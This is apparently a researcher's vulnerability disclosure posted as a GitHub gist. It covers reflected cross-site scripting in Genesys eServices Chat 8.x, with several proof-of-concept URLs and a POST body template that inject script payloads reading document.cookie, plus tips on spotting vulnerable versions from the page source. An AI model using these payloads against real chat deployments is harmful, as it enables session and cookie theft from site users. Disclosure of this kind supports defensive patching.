Created
October 15, 2019 14:28
-
-
Save MortalP0ison/5fd584b4c85fa13281fdc918913446fa to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Hi for all, | |
My name is Luis Eduardo Jácome V.(a.k.a Mortal_Poison) and I find a vulnerability(gXSS and pXSS) in Genesys eServices Chat that affects the versions 8.x.x. | |
First of all, if you find Genesys eServices Chat with "<!-- Version 8.1.200.03 -->" in the HTML Source, is vulnerable: | |
A small PoC(for versions 8.1.x): | |
https://example.com/HtmlChatPanel.jsp?Email=%3C/Script/%3E%3CScript/%3E(confirm)(document.cookie)%3C/Script/%3E | |
http://example.com/HtmlChatFrameSet.jsp?email=%3C/Script/%3E%3CScript/%3E(confirm)(1)%3C/Script/%3E | |
https://example.com/HtmlChatPanel.jsp?ActionColor=%3C/Script/%3E%3CSvg/OnLoad=(confirm)(document.cookie)%3E&ClientNickNameColor=%3C/SCRIPT/%3E&AgentNickNameColor=008000&ClientMessageColor=1532a0&AgentMessageColor=708090&Logo=.%2FResource%2FImages%2Flogo.jpg&FontSize=3&FontName=arial&ShowSmiles=1&BackgroundColor=FFFFFF | |
The problem is that application not sanitize correctly the "values" of form(HtmlChatFrameSet.jsp and/or HtmlChatPanel.jsp). | |
The file changes with respect to the version of Genesys eServices Chat. However, in any of the versions, the form is not validated. | |
For versions with HTML Source "<!-- Version 8.1.000.07 -->", you can execute the next payload: | |
https://example.com/HtmlChatPanel.jsp?ActionColor=%3C/Script/%3E%3CSvg/OnLoad=(confirm)(document.cookie)%3E&ClientNickNameColor=%3C/SCRIPT/%3E&AgentNickNameColor=008000&ClientMessageColor=1532a0&AgentMessageColor=708090&Logo=.%2FResource%2FImages%2Flogo.jpg&FontSize=3&FontName=arial&ShowSmiles=1&BackgroundColor=FFFFFF | |
If the request is made by POST method, you should see something like the following (may vary, depending on the fields of the form): | |
cmd=connect&chat_alias=&first_name=null&last_name=null&email_address=%INJECT_HERE%&celular=null&subject=null&msg2send=&secure_key=&user_id=&script_pos=&session_id=&timeZoneOffset=-300 | |
In the part of %Inject_Here% you have to inject the malicious payload as for example: </Script/><Script/>(confirm)(1)</Script/> | |
You must insert it without the "%". | |
Remember that you must capture it with an application that intercepts requests, in my case, BurpSuite. | |
The product is used by many companies, however, not all are indexed by search engines. | |
https://example.com/HtmlChatPanel.jsp?ActionColor=080008&ClientNickNameColor=000019&AgentNickNameColor=0a82d8&ClientMessageColor=030717&AgentMessageColor=0074ce&Logo=https%3A%2F%2Fcontact.falabella.com%2FWebAPI812%2FSODIMAC_AR%2FChat%2FResources%2FImages%2Flogo.jpg&FontSize=13px&FontName=arial&ShowSmiles=0&BackgroundColor=FFFFFF | |
Contact: | |
Twitter: @Mortal_Poison_ | |
Youtube: https://youtube.com/XecureLabs | |
Web Page: https://xecure-labs.com | |
Affected versions: | |
Genesys eServices Chat 8.x.x | |
Tested on: | |
Firefox 50.0 and 60.0 | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment